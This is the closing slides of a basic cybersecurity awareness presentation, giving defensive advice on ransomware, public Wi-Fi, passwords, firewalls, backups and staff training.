  • 39. How to tackle Ransomware • Back up- Keep a backed up copy of your data. Ensure its not permanently connected to the network. • Patch- Keep your software up to date. Wannacry was successful as those affected computers hadn’t updated. The update contained a fix for the problem. • Attachments- Don’t click on links from emails/SMS as this could easily be from an untrusted source and contain malware like Ransomware
  • 40. Public Wi-Fi • May not be trustworthy. They could share your information to other companies who operate in countries without any data protection. • You may not know who is watching you whilst you’re online. What to do and not do to • Don’t use online banking. Use your own data. • Don’t conduct any purchases • Use a virtual private network (VPN)
  • 41.
  • 42.
  • 43.
  • 44. CYBER SECURITY Tips Tips for protecting yourself from cybersecurity threats in 2023: Password Policy Use strong passwords and change them regularly. Information Sharing vigilant Be careful about what information you share online. Firewall and Antivirus Install a firewall and antivirus software. Systems & software Keep your systems and software up to date. Unknown link and Attachments Don't click on links or open attachments from unknown senders. Data Backup Back up your data regularly. Lastly be aware of the latest cybersecurity threats.
  • 45. Passwords Advice • Use 1 password per account. • Three random words use. Like Capitals, special characters and numbers is your own choice. • If you follow this advice your passwords security will be significantly increased against a brute force attack. • Password managers can be helpful to store your passwords.
  • 46. Advice • In the physical world we’re good at protecting ourselves and our property, we need to replicate this in the digital world. • 80% of cyber-crime is preventable.
  • 47. Advice • Update and migrate • Activate your firewall • Staff awareness • Data encryption • User accounts privileges i.e admin • Cyber insurance • Prepare Plan
  • 48. You are the best defence! • Technology is only a small part of Cyber Defence • You are the most important person – protect yourself • For any businesses the most important and best defence is Cyber Security Aware employees – train your staff Always be aware! Always be on your guard! THANK YOU